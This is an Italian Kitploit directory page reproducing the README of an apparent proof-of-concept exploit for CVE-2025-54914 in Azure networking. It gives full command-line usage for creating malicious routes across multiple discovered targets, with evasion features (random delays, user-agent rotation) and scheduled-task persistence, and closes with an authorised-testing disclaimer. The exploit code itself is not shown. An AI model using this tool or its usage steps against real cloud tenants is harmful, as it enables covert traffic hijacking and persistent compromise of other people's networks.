Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-54914-PoC — Exploit per CVE-2025-54914 in Azure Networking, che crea route dannose con evasione, persistenza, scansione multi-target e reportistica per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/ash1996x/cve-2025-54914-poc
RicognizioneMeccanismi di PersistenzaAnalisi delle VulnerabilitàExploitEvasione IDS/IPSPenetration TestingSicurezza Cloud
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

Exploit per CVE-2025-54914 in Azure Networking, che crea route dannose con evasione, persistenza, scansione multi-target e reportistica per test di sicurezza autorizzati.

Vedi Repository
44250 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-54914 Azure Route Exploit

Panoramica

Questa è un'implementazione migliorata dell'exploit CVE-2025-54914 per il routing di rete di Azure. Questa versione mantiene le funzionalità principali della CVE aggiungendo ulteriori caratteristiche tra cui persistenza, elusione, scansione multi-target e gestione degli errori.

Caratteristiche

Funzionalità principali della CVE

  • Creazione di route: Crea route dannose nelle reti virtuali di Azure
  • Eliminazione di route: Rimuove le route create per la pulizia
  • Compatibilità API: Funziona con l'API di Gestione Azure 2025-09-01
  • Autenticazione: Supporta l'autenticazione tramite Azure CLI e token manuale

Funzionalità aggiuntive

  • Tecniche di elusione: Ritardi casuali, rotazione dello user agent, offuscamento delle richieste
  • Persistenza: Creazione di attività pianificate, modalità di monitoraggio continuo
  • Scansione multi-target: Scansione e sfruttamento concorrenti di più obiettivi
  • Reportistica completa: Rapporti dettagliati con analisi dei successi/fallimenti
  • Gestione degli errori: Gestione elegante dei fallimenti e recupero
  • Gestione della configurazione: Configurazione degli obiettivi basata su JSON
  • Scoperta degli obiettivi: Rilevamento automatico delle risorse vulnerabili
  • Valutazione del rischio: Analisi delle vulnerabilità e punteggio di rischio

Installazione

Prerequisiti

root@kitploit:~
# Installa le dipendenze Python
pip install requests

# Installa Azure CLI (per autenticazione)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Configurazione

root@kitploit:~
# Rendi eseguibili gli script
chmod +x exploit.py
chmod +x exploit_utils.py

# Autenticati con Azure
az login

Utilizzo

Utilizzo base

Sfruttamento di un singolo obiettivo

root@kitploit:~
# Crea una route su un singolo obiettivo
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Elimina una route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

Sfruttamento multi-target

root@kitploit:~
# Crea un file di configurazione
python exploit_utils.py discover --output targets.json

# Sfrutta tutti gli obiettivi
python exploit.py --targets-file targets.json --operation create

Modalità scansione

root@kitploit:~
# Scansiona gli obiettivi senza sfruttarli
python exploit.py --targets-file targets.json --scan-only

Modalità persistenza

root@kitploit:~
# Abilita la persistenza con intervalli di 30 minuti
python exploit.py --targets-file targets.json --persistence-mode --interval 30

Utilizzo avanzato

Elusione e invisibilità

root@kitploit:~
# Intervalli di ritardo personalizzati per l'elusione
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

Modalità prova (dry run)

root@kitploit:~
# Test senza sfruttamento reale
python exploit.py --targets-file targets.json --dry-run

Logging dettagliato

root@kitploit:~
# Abilita il logging di debug
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

Configurazione

Formato della configurazione degli obiettivi

root@kitploit:~
{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

Variabili d'ambiente

root@kitploit:~
# Token di accesso ad Azure (alternativa ad Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Livello di log
export LOG_LEVEL="INFO"

Script di utilità

Scoperta degli obiettivi

root@kitploit:~
# Scopri tutti gli obiettivi accessibili
python exploit_utils.py discover --output discovered_targets.json

# Scopri sottoscrizioni specifiche
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

Generazione della configurazione

root@kitploit:~
# Genera la configurazione dell'exploit dagli obiettivi scoperti
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

Analisi delle vulnerabilità

root@kitploit:~
# Analizza gli obiettivi per la valutazione del rischio
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

Funzionalità di sicurezza

Tecniche di elusione

  • Temporizzazione delle richieste: Ritardi casuali tra le richieste
  • Rotazione dello user agent: Molteplici user agent di browser
  • Offuscamento delle intestazioni: Intestazioni HTTP realistiche
  • Verifica SSL: Validazione corretta dei certificati

Meccanismi di persistenza

  • Attività pianificate: Creazione di attività pianificate su Windows
  • Modalità continua: Persistenza a lungo termine
  • Gestione delle sessioni: Preservazione dello stato tra le esecuzioni
  • Persistenza della configurazione: Impostazioni salvate su disco

Gestione degli errori

  • Degrado graduale: Continua nonostante fallimenti individuali
  • Protezione dal timeout: Previene richieste bloccate
  • Gestione dei segnali: Arresto pulito su interruzione
  • Pulizia delle risorse: Pulizia automatica all'uscita

Reportistica

Rapporti sugli exploit

  • Risultati dell'operazione: Successo/fallimento per ogni obiettivo
  • Informazioni temporali: Timestamp di esecuzione
  • Dettagli degli errori: Messaggi di errore dettagliati
  • Statistiche riassuntive: Tassi di successo complessivi

Rapporti di scoperta

  • Inventario degli obiettivi: Elenco completo delle risorse scoperte
  • Ripartizione per sottoscrizione: Obiettivi raggruppati per sottoscrizione
  • Dettagli delle risorse: Informazioni su VNet, subnet e posizione

Analisi delle vulnerabilità

  • Valutazione del rischio: Categorizzazione del rischio alto/medio/basso
  • Indicatori di produzione: Identificazione degli ambienti di produzione
  • Analisi dei tag: Punteggio di rischio basato sui tag delle risorse

Buone pratiche

Sicurezza operativa

  1. Usa la modalità prova: Testa sempre prima con --dry-run
  2. Limita l'ambito: Inizia con ambienti non di produzione
  3. Monitora i log: Controlla i log per comportamenti imprevisti
  4. Pulisci: Rimuovi le route create dopo i test

Ottimizzazione delle prestazioni

  1. Limiti dei worker: Regola --max-workers in base alla capacità del sistema
  2. Regolazione dei ritardi: Bilancia invisibilità vs. velocità con le impostazioni di ritardo
  3. Elaborazione in batch: Usa file di obiettivi per operazioni su larga scala
  4. Monitoraggio delle risorse: Controlla le risorse di sistema durante l'esecuzione

Recupero da errori

  1. Controlla i log: Esamina i messaggi di errore per la risoluzione
  2. Verifica i permessi: Assicurati di avere i permessi Azure corretti
  3. Connettività di rete: Verifica la connettività Internet
  4. Validità del token: Controlla lo stato dell'autenticazione Azure CLI

Risoluzione dei problemi

Problemi comuni

Errori di autenticazione

root@kitploit:~
# Riautenticati con Azure
az login

# Controlla l'account corrente
az account show

# Elenca le sottoscrizioni accessibili
az account list

Errori di permessi

root@kitploit:~
# Controlla i permessi richiesti
az role assignment list --assignee $(az account show --query user.name -o tsv)

Errori di rete

root@kitploit:~
# Testa la connettività
curl -I https://management.azure.com

# Controlla le impostazioni proxy
echo $HTTP_PROXY
echo $HTTPS_PROXY

Modalità debug

root@kitploit:~
# Abilita il logging dettagliato
python exploit.py --log-level DEBUG --log-file debug.log

# Controlla il file di log
tail -f debug.log

Considerazioni legali ed etiche

⚠️ IMPORTANTE: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati.

  • Autorizzazione richiesta: Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione
  • Conformità legale: Assicurati di rispettare le leggi e i regolamenti locali
  • Divulgazione responsabile: Segnala le vulnerabilità attraverso i canali appropriati
  • Uso educativo: Questo strumento è destinato a scopi educativi e di ricerca

Licenza

Questo progetto è concesso in licenza per uso esclusivamente di ricerca e didattico. L'uso commerciale richiede autorizzazione esplicita.

Contributi

  1. Fai un fork del repository
  2. Crea un branch per le funzionalità
  3. Apporta le tue modifiche
  4. Aggiungi test se applicabile
  5. Invia una pull request

Supporto

Per problemi e domande:

  1. Controlla la sezione di risoluzione dei problemi
  2. Esamina i log per i dettagli degli errori
  3. Crea un problema con informazioni dettagliate
  4. Includi la configurazione e i messaggi di errore pertinenti
Scarica lo strumento